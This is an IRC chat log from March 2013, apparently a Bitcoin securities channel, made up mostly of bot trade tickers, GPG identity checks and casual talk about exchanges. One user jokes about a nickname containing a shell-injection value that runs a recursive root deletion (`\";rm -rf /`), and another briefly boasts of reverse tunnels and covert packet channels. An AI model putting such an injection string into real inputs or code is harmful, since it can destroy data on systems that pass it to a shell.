155 @ 0.00499 = 0.7735 BTC [+] Mar 18 07:27:48 [BTCTC] [ASICMINER-PT] 1 @ 0.874695 BTC [-] Mar 18 07:36:45 lol, mircea_popescu how is 101401.7833687 a 'nice round number'? Mar 18 07:36:57 Not sure I'm following you but anyway Mar 18 07:37:02 [MPEX] [S.MPOE] 6950 @ 0.00068138 = 4.7356 BTC [-] Mar 18 07:37:02 @Usagi Mar 18 07:43:31 smickles sh :p Mar 18 07:45:28 so Mar 18 07:45:33 I think what I'm going to do is this Mar 18 07:45:39 issue $100m worth of bonds Mar 18 07:46:03 go to jail Mar 18 07:46:05 ??? Mar 18 07:46:06 profit. Mar 18 07:46:16 no Mar 18 07:46:28 and basically bankrupt verizon by eating their lunch Mar 18 07:47:28 Well, I'm off, night everyone. Mar 18 07:48:33 you know its bad when you see ppl in merrica go to sleep. Mar 18 07:50:52 lol Mar 18 07:51:36 [BTCTC] [ASICMINER-PT] 1 @ 0.821501 BTC [-] Mar 18 07:51:58 OMFG, threading is awesome! Mar 18 07:52:02 [HAVELOCK] [HIM] 1 @ 2 BTC [+] Mar 18 07:52:25 [BTCTC] [ASICMINER-PT] 1 @ 0.87193 BTC [+] Mar 18 07:58:01 [HAVELOCK] [SDICE] 1 @ 0.54 BTC [-] Mar 18 07:59:01 [HAVELOCK] [SDICE] 2 @ 0.535 = 1.07 BTC [-] Mar 18 08:02:00 [HAVELOCK] [SDICE] 1 @ 0.5130002 BTC [-] Mar 18 08:09:07 smickles: I am going to beat you like a drum Mar 18 08:09:12 async messaging > threading Mar 18 08:10:35 [BTCTC] [ASICMINER-PT] 15 @ 0.8215 = 12.3225 BTC [-] Mar 18 08:10:37 [BTCTC] [ASICMINER-PT] 1 @ 0.82 BTC [-] Mar 18 08:10:39 [BTCTC] [ASICMINER-PT] 1 @ 0.81 BTC [-] Mar 18 08:16:53 [BTCTC] [COGNITIVE] 2 @ 0.1978 = 0.3956 BTC [+] Mar 18 08:16:56 [BTCTC] [COGNITIVE] 2 @ 0.1979 = 0.3958 BTC [+] Mar 18 08:16:58 [BTCTC] [COGNITIVE] 15 @ 0.198 = 2.97 BTC [+] Mar 18 08:17:00 [BTCTC] [COGNITIVE] 3 @ 0.199999 = 0.6 BTC [+] Mar 18 08:18:08 @SarahKSilverman My heart breaks for people who don't know the relief & joy of being wrong & saying sorry Mar 18 08:18:16 [BTCTC] [ESECURITYSABTC] 1 @ 0.48993 BTC [+] Mar 18 08:18:19 @Mircea_Popescu @SarahKSilverman Too old to have your heart broken for the proper reasons ? Mar 18 08:25:48 making friends still I see Mar 18 08:28:45 ever read swift ? Mar 18 08:29:01 i read taylor swift all the time Mar 18 08:29:06 she's brilliant Mar 18 08:29:27 lol Mar 18 08:29:31 johnatan Mar 18 08:29:35 i don't read these new things Mar 18 08:40:58 soebot is back :D Mar 18 08:43:53 $email Mar 18 08:43:54 mircea_popescu: No new messages received. Mar 18 08:44:32 $markov Mar 18 08:44:33 indeed. far away in the stroller, comes back with 3 strollers and a motorbike Mar 18 08:44:51 o_0 Mar 18 08:48:54 lol Mar 18 08:51:24 [MPEX] [S.MPOE] 16800 @ 0.00068708 = 11.5429 BTC [+] Mar 18 08:51:26 [MPEX] [S.MPOE] 10300 @ 0.00069629 = 7.1718 BTC [+] Mar 18 09:04:31 [BTCTC] [ASICMINER-PT] 4 @ 0.800075 = 3.2003 BTC [-] Mar 18 09:04:34 [BTCTC] [ASICMINER-PT] 10 @ 0.8 = 8 BTC [-] Mar 18 09:06:57 $doom Mar 18 09:07:00 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] Mar 18 09:07:03 boo Mar 18 09:08:39 [MPEX] [S.MPOE] 2000 @ 0.00069629 = 1.3926 BTC [+] Mar 18 09:08:41 [MPEX] [S.MPOE] 9150 @ 0.00069728 = 6.3801 BTC [+] Mar 18 09:25:08 [BTCTC] [COG.F] 1 @ 2.5 BTC Mar 18 09:29:11 [BTCTC] [ESECURITYSABTC] 6 @ 0.48994 = 2.9396 BTC [+] Mar 18 09:31:30 [MPEX] [S.MPOE] 9947 @ 0.00069178 = 6.8811 BTC [-] Mar 18 09:31:39 [MPEX] [S.MPOE] 3050 @ 0.00068138 = 2.0782 BTC [-] Mar 18 09:31:40 [MPEX] [S.MPOE] 4112 @ 0.00067896 = 2.7919 BTC [-] Mar 18 09:41:04 $moo Mar 18 10:02:34 [MPEX] [S.MPOE] 4700 @ 0.00069001 = 3.243 BTC [+] Mar 18 10:09:58 Hi All :) Mar 18 10:21:54 [BTCTC] [B.YABMC] 1 @ 0.01966 BTC [+] Mar 18 10:22:11 options on btct.co! Mar 18 10:23:12 < dub> $moo << do that again Mar 18 10:30:20 $moo Mar 18 10:30:21 dub: It's starting to sound like Wal-Mart in here Mar 18 10:53:54 [MPEX] [S.MPOE] 22850 @ 0.00069001 = 15.7667 BTC [+] Mar 18 10:53:56 [MPEX] [S.MPOE] 8150 @ 0.00068212 = 5.5593 BTC [-] Mar 18 10:53:58 [MPEX] [S.MPOE] 13600 @ 0.0006814 = 9.267 BTC [-] Mar 18 10:54:00 [MPEX] [S.MPOE] 5588 @ 0.00067896 = 3.794 BTC [-] Mar 18 11:06:40 [BTCTC] [ASICMINER-PT] 10 @ 0.792125 = 7.9213 BTC [-] Mar 18 11:07:12 [BTCTC] [ASICMINER-PT] 10 @ 0.792 = 7.92 BTC [-] Mar 18 11:07:50 [MPEX] [S.MPOE] 5450 @ 0.00067637 = 3.6862 BTC [-] Mar 18 11:07:56 [BTCTC] [ASICMINER-PT] 1 @ 0.791 BTC [-] Mar 18 11:08:44 [BTCTC] [ASICMINER-PT] 1 @ 0.791 BTC [-] Mar 18 11:09:18 sell off :. Mar 18 11:32:08 [BTCTC] [PAJKA.BOND] 4 @ 0.105 = 0.42 BTC [-] Mar 18 11:32:10 [BTCTC] [PAJKA.BOND] 80 @ 0.105 = 8.4 BTC [-] Mar 18 11:38:22 [MPEX] [S.MPOE] 2506 @ 0.00067637 = 1.695 BTC [-] Mar 18 11:38:24 [MPEX] [S.MPOE] 5415 @ 0.00067587 = 3.6598 BTC [-] Mar 18 11:38:31 [MPEX] [S.MPOE] 7576 @ 0.00067334 = 5.1012 BTC [-] Mar 18 11:38:33 [MPEX] [S.MPOE] 4653 @ 0.00066743 = 3.1056 BTC [-] Mar 18 11:52:48 [BTCTC] [PAJKA.BOND] 16 @ 0.105 = 1.68 BTC [-] Mar 18 12:00:09 [BTCTC] [ASICMINER-PT] 1 @ 0.849999 BTC [+] Mar 18 12:13:40 hey guys Mar 18 12:14:00 OIX is down a bit huh? Mar 18 12:27:17 kako Mar 18 12:27:19 wake up Mar 18 12:50:51 ;;bc,stats Mar 18 12:50:54 Current Blocks: 226538 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 1269 blocks | Next Difficulty In About: 6 days, 10 hours, 35 minutes, and 56 seconds | Next Difficulty Estimate: 6138999.72395 | Estimated Percent Change: 26.63875 Mar 18 12:50:54 [MPEX] [S.MPOE] 17150 @ 0.0006681 = 11.4579 BTC [+] Mar 18 13:02:14 [BTCTC] [S.MPOE-PT] 1370 @ 0.000708 = 0.97 BTC [-] Mar 18 13:07:17 [MPEX] [S.MPOE] 7038 @ 0.0006681 = 4.7021 BTC [+] Mar 18 13:07:18 [MPEX] [S.MPOE] 2662 @ 0.00066743 = 1.7767 BTC [-] Mar 18 13:13:09 http://istheblockchainforked.com/ lulz Mar 18 13:15:15 [MPEX] [S.MPOE] 4000 @ 0.00067599 = 2.704 BTC [+] Mar 18 13:27:53 [MPEX] [S.MPOE] 3437 @ 0.00067599 = 2.3234 BTC [+] Mar 18 13:27:55 [MPEX] [S.MPOE] 16712 @ 0.00067679 = 11.3105 BTC [+] Mar 18 13:41:03 [MPEX] [S.MPOE] 10900 @ 0.00069048 = 7.5262 BTC [+] Mar 18 13:41:05 [MPEX] [S.MPOE] 13900 @ 0.00069112 = 9.6066 BTC [+] Mar 18 13:59:16 [MPEX] [S.MPOE] 10451 @ 0.00068713 = 7.1812 BTC [-] Mar 18 13:59:18 [MPEX] [S.MPOE] 13608 @ 0.00068243 = 9.2865 BTC [-] Mar 18 14:10:34 !ticker mpex s.dice Mar 18 14:10:36 [MPEX:S.DICE] 1D: 0.00444444 / 0.00474956 / 0.0051 (602 shares, 2.86 BTC), 7D: 0.00444444 / 0.00516205 / 0.00599987 (72521 shares, 374.36 BTC), 30D: 0.00300001 / 0.00610218 / 0.0069 (2302441 shares, 14,049.93 BTC) Mar 18 14:10:46 [MPEX] [S.MPOE] 12962 @ 0.00069112 = 8.9583 BTC [+] Mar 18 14:10:53 [MPEX] [S.MPOE] 2938 @ 0.00069593 = 2.0446 BTC [+] Mar 18 14:24:51 [BTCTC] [S.BBET-PT] 2 @ 0.00172 = 0.0034 BTC [-] Mar 18 14:31:54 [MPEX] [S.MPOE] 5012 @ 0.00069593 = 3.488 BTC [+] Mar 18 14:31:56 [MPEX] [S.MPOE] 3488 @ 0.00069728 = 2.4321 BTC [+] Mar 18 14:50:51 [MPEX] [S.MPOE] 3392 @ 0.00068243 = 2.3148 BTC [-] Mar 18 14:50:53 [MPEX] [S.MPOE] 1074 @ 0.00068028 = 0.7306 BTC [-] Mar 18 15:26:39 [BTCTC] [COG.F] 1 @ 2.5 BTC Mar 18 15:30:00 [HAVELOCK] [SDICE] 1 @ 0.56 BTC [+] Mar 18 15:39:08 [BTCTC] [ASICMINER-PT] 2 @ 0.849999 = 1.7 BTC [+] Mar 18 15:52:00 [HAVELOCK] [HIM] 1 @ 2 BTC [+] Mar 18 15:52:14 mircea_popescu Mar 18 15:52:20 is a Mar 18 15:52:37 mircea_popescu, I has been quoted. I want my royalties. Mar 18 15:55:16 link Mar 18 15:56:41 http://trilema.com/2013/mpex-ddosed-an-epic/ Mar 18 15:57:29 [BTCTC] [SYNERGY] 1 @ 0.01028 BTC [-] Mar 18 15:57:31 [BTCTC] [SYNERGY] 1 @ 0.01027 BTC [-] Mar 18 15:57:33 [BTCTC] [SYNERGY] 6 @ 0.01 = 0.06 BTC [-] Mar 18 15:59:25 imsaguy, what do you want? free mpex acct? i guess mp's offer doesn't extend so far Mar 18 16:00:29 you'll have to choose from the 5 or so options i PM'd you anyway, no need to make a fuss around it Mar 18 16:04:28 who's making a fuss? Mar 18 16:05:00 TFA clearly says i'm collecting the claims. Mar 18 16:05:16 imsaguy you can have my free account Mar 18 16:05:17 and i'm still waiting for you to choose Mar 18 16:05:28 mircea_popescu totaly promised me a free mpex account Mar 18 16:05:36 don't let him weasel out either Mar 18 16:05:53 I'm sorry, I missed the PPS Mar 18 16:06:04 he gave me a free one, cause no one would take them at the time Mar 18 16:06:07 you've have to forgive my missing that one line at the very end of the frakking article Mar 18 16:06:21 s/you've/you/ Mar 18 16:06:38 I didn't mean to step on your toes Mar 18 16:07:06 too many hookers and blow this weekend Mar 18 16:07:13 i'm not even hearing your words Mar 18 16:07:19 np :) Mar 18 16:07:40 its fine Mar 18 16:07:51 ;;calc 25*[ticker --last] Mar 18 16:07:51 1188.00075 Mar 18 16:08:03 http://i.imgur.com/sQXyefn.jpg Mar 18 16:08:07 from my cold, dead hands Mar 18 16:10:46 ;;everify freenode:#bitcoin-otc:db7c48cd4027f8901d2642cd24ccf4cb2ebff53183c88985f1a6c1f0 Mar 18 16:10:48 You are now authenticated for user jurov with key 677ABD62D0AEE7D7 Mar 18 16:10:55 you can't afford that ammo Mar 18 16:10:58 quit lying Mar 18 16:11:02 heh Mar 18 16:11:16 cost me less than 25BTC Mar 18 16:11:17 :p Mar 18 16:11:23 damn Mar 18 16:11:26 got me there. Mar 18 16:11:43 you've got less than 6 hours Mar 18 16:11:43 ;;ident imsaguy Mar 18 16:11:44 Nick 'imsaguy', with hostmask 'imsaguy!~imsaguy@unaffiliated/imsaguy', is not identified. Mar 18 16:11:47 then i'm on the move Mar 18 16:11:57 ;;tell jurov gpg info imsaguy Mar 18 16:12:03 that gives you all the info you need :p Mar 18 16:12:10 can't ident Mar 18 16:12:11 imposter Mar 18 16:12:40 more like I dont have my gpg keys on all of my machines Mar 18 16:12:53 whatever shill Mar 18 16:13:00 IMPOSTER! Mar 18 16:13:36 shell->shell->shell->shell->shell->reverse tunnel->shell->port knock->auth Mar 18 16:13:37 like Mar 18 16:13:40 is easy Mar 18 16:15:10 [BTCTC] [BASIC-MINING] 1 @ 0.33318 BTC [-] Mar 18 16:15:11 i have a service that retreives everify and sends me the decrypted string in the udp header of a fake netbios packet Mar 18 16:15:26 so i dont have to log into the machine with the key Mar 18 16:15:35 nice pigeons Mar 18 16:16:22 [BTCTC] [GSDPT] 65 @ 0.00499 = 0.3244 BTC [+] Mar 18 16:31:58 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] Mar 18 16:34:37 so i found out there's a #googleglass channel Mar 18 16:37:17 [BTCTC] [B.YABMC] 2 @ 0.00821 = 0.0164 BTC [-] Mar 18 16:37:57 [BTCTC] [COGNITIVE] 1 @ 0.26 BTC [+] Mar 18 16:44:24 [BTCTC] [S.DICE-PT] 20 @ 0.00508 = 0.1016 BTC [+] Mar 18 16:44:26 [BTCTC] [S.DICE-PT] 91 @ 0.00509 = 0.4632 BTC [+] Mar 18 16:52:59 what is this about hookers and blow? :) Mar 18 16:53:15 go back to your rice Mar 18 16:53:21 no necro bumping Mar 18 16:53:48 no necro here :) Mar 18 17:02:40 ;;bc,stats Mar 18 17:02:43 Current Blocks: 226571 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 1236 blocks | Next Difficulty In About: 6 days, 5 hours, 3 minutes, and 55 seconds | Next Difficulty Estimate: 6167651.23612 | Estimated Percent Change: 27.22979 Mar 18 17:03:09 still 27% Mar 18 17:03:19 [MPEX] [S.MPOE] 10350 @ 0.0006819 = 7.0577 BTC [+] Mar 18 17:19:39 [MPEX] [S.MPOE] 8250 @ 0.00068526 = 5.6534 BTC [+] Mar 18 17:35:20 ;;gpg info "[\\\]" Mar 18 17:35:21 No such user registered. Mar 18 17:35:34 ;;ident [\\\] Mar 18 17:35:35 Error: "\\\" is not a valid command. Mar 18 17:35:39 ;;ident "[\\\]" Mar 18 17:35:40 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Mar 18 17:36:05 how one verifies users with such douchy nicks? Mar 18 17:36:17 i'll post bond that it's really imsaguy Mar 18 17:36:26 i know Mar 18 17:36:47 \nick \";rm -rf / Mar 18 17:37:00 ;;ident "/[/\/\/\/]" Mar 18 17:37:01 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Mar 18 17:37:15 lol Mar 18 17:37:25 \nick "\";rm -rf /" Mar 18 17:37:41 i cant even set something like that for myself Mar 18 17:37:50 not douchey enough Mar 18 17:37:59 [MPEX] [S.MPOE] 4550 @ 0.00069502 = 3.1623 BTC [+] Mar 18 17:38:05 ;;ident \[\\\\\\\] Mar 18 17:38:06 Error: "\\\\\\\" is not a valid command. Mar 18 17:38:13 ;;ident "\[\\\\\\\]" Mar 18 17:38:14 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Mar 18 17:47:45 lol Mar 18 17:47:53 <[\\\]> ;;ident Mar 18 17:47:54 You are identified as user imsaguy, with GPG key id 7D7EA76776E6CE48, key fingerprint A1398F4C58AC3D387F012AFA7D7EA76776E6CE48, and bitcoin address 1Hf5qWZzd2WsrDwLhkykNc4uXPAkykg9PM Mar 18 17:47:56 <[\\\]> how's that? Mar 18 17:48:08 <[\\\]> for the record, its: Mar 18 17:48:17 <[\\\]> ;;ident "[\\\\\\]" Mar 18 17:48:17 Nick '[\\\]', with hostmask '[\\\]!~imsaguy@unaffiliated/imsaguy', is identified as user imsaguy, with GPG key id 7D7EA76776E6CE48, key fingerprint A1398F4C58AC3D387F012AFA7D7EA76776E6CE48, and bitcoin address 1Hf5qWZzd2WsrDwLhkykNc4uXPAkykg9PM Mar 18 17:48:54 <[\\\]> today's teaching moment has been brought to you by tripleslash Mar 18 17:57:15 [MPEX] [S.MPOE] 3100 @ 0.0006819 = 2.1139 BTC [-] Mar 18 17:57:17 [MPEX] [S.MPOE] 5400 @ 0.00068093 = 3.677 BTC [-] Mar 18 18:00:20 i'm working out the offices of a startup in mountain view Mar 18 18:00:38 and the small scale of their vision coupled with the huge scale of their burn rate is stunning Mar 18 18:00:48 [MPEX] [S.DICE] 2200 @ 0.0051 = 11.22 BTC [+] Mar 18 18:01:00 [HAVELOCK] [SDICE] 4 @ 0.5132 = 2.0528 BTC [-] Mar 18 18:01:01 [HAVELOCK] [SDICE] 2 @ 0.5131 = 1.0262 BTC [-] Mar 18 18:01:02 [HAVELOCK] [SDICE] 4 @ 0.5130001 = 2.052 BTC [-] Mar 18 18:01:04 [HAVELOCK] [SDICE] 12 @ 0.513 = 6.156 BTC [-] Mar 18 18:04:24 benkay? Mar 18 18:05:56 yes. Mar 18 18:08:31 [MPEX] [S.MPOE] 7402 @ 0.00068745 = 5.0885 BTC [+] Mar 18 18:11:01 $vwap ^oix Mar 18 18:11:03 smickles: 1 day: no data 7 day: average: 40.34616177 high: 57.75068238 low: 37.78983401 volume: 35630 btc: 4870.67581779 30 day: no data Mar 18 18:16:58 "Your BitPay Merchant Account is approved! " < a day late, and 1% short Mar 18 18:20:54 https://www.tradehill.com/ isn't it bootstrap, too? Mar 18 18:21:16 tradehill still exists? Mar 18 18:21:19 and you'd use it? Mar 18 18:21:54 no, just looking... apparently they just relaunched Mar 18 18:25:52 [BTCTC] [BTC-GOLD] 10 @ 0.011 = 0.11 BTC [-] Mar 18 18:26:54 [MPEX] [O.BTCUSD.P430T] 8 @ 0.0885639 = 0.7085 BTC [+] Mar 18 18:30:48 http://venturebeat.com/2013/03/18/embattled-bitcoin-exchange-tradehill-is-back/ Mar 18 18:33:03 ;;calc 43/1.0885639 Mar 18 18:33:03 39.5015855293 Mar 18 18:36:16 lmao slovak PM today uncovered a wall sculpture of Janosik - a national hero akin to Robin Hood Mar 18 18:36:28 and said "he was first social democrat" Mar 18 18:36:57 he has this sculpture in his very office Mar 18 18:38:28 ha Mar 18 18:38:54 Janosik was hanged 300 years ago... while I don't wish the same to Robert Fico (our PM)... but he really deserves it Mar 18 18:39:09 lol tradehill Mar 18 18:39:15 those guys should GTFO Mar 18 18:39:23 fuckin lamers Mar 18 18:42:05 ;;goxlag Mar 18 18:42:06 18.125554 seconds Mar 18 18:42:11 kakobrekla: ^ :) Mar 18 18:46:58 ;;ticker Mar 18 18:46:58 BTCUSD ticker | Best bid: 47.55000, Best ask: 47.77999, Bid-ask spread: 0.22999, Last trade: 47.77999, 24 hour volume: 18298.11032076, 24 hour low: 47.07679, 24 hour high: 47.80000, 24 hour vwap: 47.54930 Mar 18 18:51:53 [MPEX] [S.MPOE] 6627 @ 0.00069196 = 4.5856 BTC [+] Mar 18 18:53:46 !ticker mpex s.dice Mar 18 18:53:49 [MPEX:S.DICE] 1D: 0.004501 / 0.00502512 / 0.0051 (2800 shares, 14.07 BTC), 7D: 0.00444444 / 0.00516022 / 0.00599987 (74721 shares, 385.58 BTC), 30D: 0.00300001 / 0.0061008 / 0.0069 (2302191 shares, 14,045.22 BTC) Mar 18 18:55:39 [BTCTC] [COGNITIVE] 4 @ 0.25 = 1 BTC [-] Mar 18 18:56:56 [BTCTC] [COGNITIVE] 1 @ 0.24 BTC [-] Mar 18 19:26:52 ;;ticker Mar 18 19:26:53 BTCUSD ticker | Best bid: 47.54225, Best ask: 47.80000, Bid-ask spread: 0.25775, Last trade: 47.80000, 24 hour volume: 18802.01731684, 24 hour low: 47.07679, 24 hour high: 47.80000, 24 hour vwap: 47.55388 Mar 18 19:35:47 [BTCTC] [ASICMINER-PT] 1 @ 0.849999 BTC [+] Mar 18 19:43:16 wow, soebot is a lot faster now Mar 18 19:43:57 a little bit of refactoring goes a long way Mar 18 19:45:43 [BTCTC] [SYNERGY] 2 @ 0.00801 = 0.016 BTC [-] Mar 18 19:45:46 [BTCTC] [SYNERGY] 3 @ 0.008 = 0.024 BTC [-] Mar 18 19:45:47 [BTCTC] [SYNERGY] 3 @ 0.0065 = 0.0195 BTC [-] Mar 18 19:45:49 [BTCTC] [SYNERGY] 20 @ 0.00601 = 0.1202 BTC [-] Mar 18 19:57:35 [MPEX] [S.MPOE] 4521 @ 0.00069196 = 3.1284 BTC [+] Mar 18 20:05:29 interesting... suprised i didn't hear bout tradehill being back Mar 18 20:05:59 wtf Mar 18 20:06:27 The new site goes live today with a new business-focused product dubbed “Prime.” Mar 18 20:06:51 heh Mar 18 20:06:57 I saw that in my rss feed like two days ago Mar 18 20:07:37 like the least interesting, least profitable thing you can do with bitcoins is trade them for dollars Mar 18 20:07:56 yeah, especially since the USD is crashing Mar 18 20:08:01 bitcoin is the new gold Mar 18 20:09:12 "Please email us at claim@tradehill.com and I will put you in touch with the person doing payouts for the old company. Nearly all of the funds have already been claimed, and we would like to make you whole today if possible." Mar 18 20:09:29 <[\\\]> They must have gotten a new round of angel funds Mar 18 20:09:35 <[\\\]> nothing like continuing the bleed. Mar 18 20:09:44 it's the same people? Mar 18 20:09:45 imma gonna stab someone in teh face Mar 18 20:09:48 over the internets. Mar 18 20:09:48 <[\\\]> yes Mar 18 20:09:53 <[\\\]> same ceo and cto Mar 18 20:09:53 [\\\]: The new team, based in San Francisco, has raised a small seed round of funding from angel investors and expects to close a first round of about $300,000 in the coming months. Mar 18 20:10:03 <[\\\]> new team? Mar 18 20:10:05 they're determined Mar 18 20:10:06 <[\\\]> its the same figure heads Mar 18 20:10:12 meet the new team...same as the old team Mar 18 20:10:39 red team blue team? Mar 18 20:10:42 <[\\\]> first verse, same as the first, whole lot louder and a whole lot worse. Mar 18 20:10:51 "Singer said the company made the decision to keep the Tradehill name as it’s an “established brand” with a strong network." Mar 18 20:10:56 <[\\\]> err, second Mar 18 20:12:45 lol, i went to their site w/o javascript.... blank page © tradehil Mar 18 20:14:29 well just make up a ridiculous joke of what you think it couldn't say, and that's what it says Mar 18 20:14:45 haha Mar 18 20:16:40 <[\\\]> photoshop something on to it Mar 18 20:16:48 <[\\\]> like a picture of a guy with a shoe on his head Mar 18 20:16:52 <[\\\]> "Must be legit." Mar 18 20:16:53 coinlab, tradehill, it sounds like the new hot business model is to position yourself as a "trading tool for professionals" and hope some sucker decides to throw some real money at trading and actually believes your crap that you are the way to go Mar 18 20:17:04 o wait whats the story with bakewell now Mar 18 20:17:06 scammur? Mar 18 20:17:18 and yet none of them sound like products pro traders would use Mar 18 20:17:20 lacking in words like Mar 18 20:17:23 "forex" Mar 18 20:17:25 "hedge" Mar 18 20:17:32 hey hey those words are taken Mar 18 20:17:33 he can't be a scammer his picture shows him wearing a tie Mar 18 20:17:35 "option" Mar 18 20:17:38 <[\\\]> benkay, but "bitcoin" Mar 18 20:17:48 dude i know slashes Mar 18 20:17:56 i'm sitting in a mountain view startup office right now Mar 18 20:18:02 full of wankers Mar 18 20:18:20 <[\\\]> The world is about 50% wankers Mar 18 20:18:24 up arrow stuck? Mar 18 20:18:28 should be more careful, these logs are public. Mar 18 20:18:41 <[\\\]> Ive already been quoted. Mar 18 20:18:46 <[\\\]> working on royalties now. Mar 18 20:18:51 anyways Mar 18 20:18:58 "BITCOINZOMG" Mar 18 20:19:11 except that it's not a good tech for the us. and nobody in sv gets that. Mar 18 20:19:24 kakobrekla: link to bakewell drama? Mar 18 20:19:28 © i should prepend a © to all my lines Mar 18 20:19:28 they don't really get markets outside of the west coast tech bubble in most events. Mar 18 20:19:46 pigeons dunno i herd he missed a payment is all Mar 18 20:20:03 now its been a week or so since Mar 18 20:20:15 oh, yeah i heard he stopped paying dividends a few weeks ago cuz..."waiting for asics" Mar 18 20:20:31 O_o Mar 18 20:21:31 tradehill learned its lesson so this time they are a "fan club" only for accredited investors Mar 18 20:22:08 hahahah Mar 18 20:23:17 jeeze Mar 18 20:27:50 Chaang-Noi https://bitcointalk.org/index.php?topic=153979.msg1638301#msg1638301 Mar 18 20:29:40 mircea_popescu: oh god, it hates me Mar 18 20:29:49 isufficient funds for a stat Mar 18 20:32:47 “This is a bank with a country attached.” Mar 18 20:33:50 ;;whois gigatube Mar 18 20:33:51 jcpham (~jcpham@unaffiliated/jcpham) has been on server zelazny.freenode.net since 05:03 PM, March 12, 2013 (idle for 38 seconds) and is voiced on bitcoin-otc and is also on #bitcoin-assets and #ripple. Mar 18 20:34:02 get them tied Mar 18 20:34:08 (the tubes) Mar 18 20:34:28 y u whois'n me Mar 18 20:34:40 u got beef pal Mar 18 20:34:45 wanna fight about it Mar 18 20:34:57 if you do have beef, i'd like a sandwich Mar 18 20:35:09 i'd put mayonaisse on it Mar 18 20:35:17 man mayonaisse Mar 18 20:35:21 no, not mayo Mar 18 20:35:25 put horseradish mustard on it Mar 18 20:35:27 i remember on efnet you would get kicked if you whois someone you don't know via the server not publically through an in channel bot even Mar 18 20:35:37 cold roast beef sandwitch with horseradish mustard om nom Mar 18 20:35:39 Diablo-D3 is thirsty for my man-maisse Mar 18 20:35:48 horsey sauce Mar 18 20:35:59 mmmm Mar 18 20:36:03 horsey sauce Mar 18 20:37:12 horsey sauce *may not contain horse, unless tesco brand Mar 18 20:44:32 [BTCTC] [ASICMINER-PT] 5 @ 0.849999 = 4.25 BTC [+] Mar 18 20:45:15 i'm a little suprised that we're still in the mid-upper 40's Mar 18 20:46:56 I know Mar 18 20:47:02 you'd think we'd be past 100 b now Mar 18 20:47:14 50 has resistance for sure Mar 18 20:47:39 probably ewoks at work Mar 18 20:47:43 if i had to speculate Mar 18 20:47:50 $vwap ^oix Mar 18 20:47:51 smickles: 1 day: no data 7 day: average: 40.34617835 high: 57.75068238 low: 37.79027943 volume: 35638 btc: 4871.38432899 30 day: no data Mar 18 20:48:12 and the peeps on mpex thought it's be much lower than here Mar 18 20:48:42 almost 90% of them averaging out at 37.79 Mar 18 20:48:49 [MPEX] [S.MPOE] 10269 @ 0.00068859 = 7.0711 BTC [-] Mar 18 20:48:51 10 bucks lower Mar 18 20:53:25 maybe it's cause there are no C1000 options Mar 18 20:53:48 wts C2000, maybe C5000 even. Mar 18 20:54:29 !last m s.dice Mar 18 20:54:30 Last trade for S.DICE on MPEX was at 0.0051 BTC [+] Mar 18 20:54:59 !ticker m s.dice Mar 18 20:55:00 [MPEX:S.DICE] 1D: 0.004501 / 0.00502512 / 0.0051 (2800 shares, 14.07 BTC), 7D: 0.00444444 / 0.00515833 / 0.00599987 (73721 shares, 380.28 BTC), 30D: 0.00300001 / 0.00609941 / 0.0069 (2297441 shares, 14,013.03 BTC) Mar 18 20:58:07 !ticker m s.bbet Mar 18 20:58:09 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0015 / 0.00195371 / 0.002014 (31300 shares, 61.15 BTC), 30D: 0.0015 / 0.00181129 / 0.002014 (117806 shares, 213.38 BTC) Mar 18 20:58:47 hmm, let's see Mar 18 20:58:53 $vwap s.bbet Mar 18 20:58:55 smickles: 1 day: no data 7 day: average: 0.00195372 high: 0.002014 low: 0.0015 volume: 31300 btc: 61.1513 30 day: average: 0.00181129 high: 0.002014 low: 0.0015 volume: 117806 btc: 213.38132387 Mar 18 20:59:12 yup, takes up more room Mar 18 21:00:51 [MPEX] [S.MPOE] 62 @ 0.00069728 = 0.0432 BTC [+] Mar 18 21:00:53 [MPEX] [S.MPOE] 489 @ 0.00070107 = 0.3428 BTC [+] Mar 18 21:00:55 [MPEX] [S.MPOE] 10700 @ 0.00070374 = 7.53 BTC [+] Mar 18 21:01:00 [MPEX] [S.MPOE] 1202 @ 0.00071737 = 0.8623 BTC [+] Mar 18 21:03:54 ah nice smickles - I like the vwaps better Mar 18 21:04:17 guruvan: if you like that, checkout smickles.com/mpex-gui/ Mar 18 21:04:20 ;D Mar 18 21:04:53 [BTCTC] [ASICMINER-PT] 1 @ 0.849999 BTC [+] Mar 18 21:05:32 [BTCTC] [ASICMINER-PT] 1 @ 0.849999 BTC [+] Mar 18 21:05:36 [BTCTC] [ASICMINER-PT] 1 @ 0.849999 BTC [+] Mar 18 21:06:36 smickles - that's just pure awesome. I might have to get me one Mar 18 21:07:03 thanks :) Mar 18 21:07:35 source comes with? Mar 18 21:08:07 yes, but it's personal use, do not distribute original or modifications plz Mar 18 21:08:45 (as this is a comercial operation) Mar 18 21:08:50 nope - of course not :) Mar 18 21:09:21 but it would be great to be able to extend it some Mar 18 21:11:02 totally. also, if you do something that really ought to be in the original, tell me. I'll wan't to buy it off of you or put it in for a royalty or some such Mar 18 21:12:15 yah. would do that for sure.....also...you haz typo on smickles.com "I've recently lunched"... Mar 18 21:12:35 oh no D: thx for pointing that out :) Mar 18 21:12:36 nom Mar 18 21:12:42 ;) Mar 18 21:15:48 btc guild has been rockin' it recently Mar 18 21:16:05 these fast blocks are nice Mar 18 21:16:17 ;;bc,nethash Mar 18 21:16:18 47054.171902327282 Mar 18 21:16:20 Is it a bad pracice to use my regular email when creating an account at mpex? Mar 18 21:16:24 what is with that eligius ad? Mar 18 21:16:31 "0% pps" Mar 18 21:16:40 so you don't get paid anything for mining? Mar 18 21:16:49 it all goes to jesus Mar 18 21:17:37 haha Mar 18 21:17:41 lol Mar 18 21:17:53 forgive me lord Mar 18 21:18:08 for i have mined at deepbit Mar 18 21:18:44 uh don't do that if are Mar 18 21:18:57 if you are Mar 18 21:19:32 i'm sorry, really, i did it back in the day before tycho made his political position known Mar 18 21:19:48 [BTCTC] [ASICMINER-PT] 1 @ 0.8697 BTC [+] Mar 18 21:19:57 whats his position? Mar 18 21:20:03 jonny7 you mean when creating your key pair? Mar 18 21:20:28 dub: i 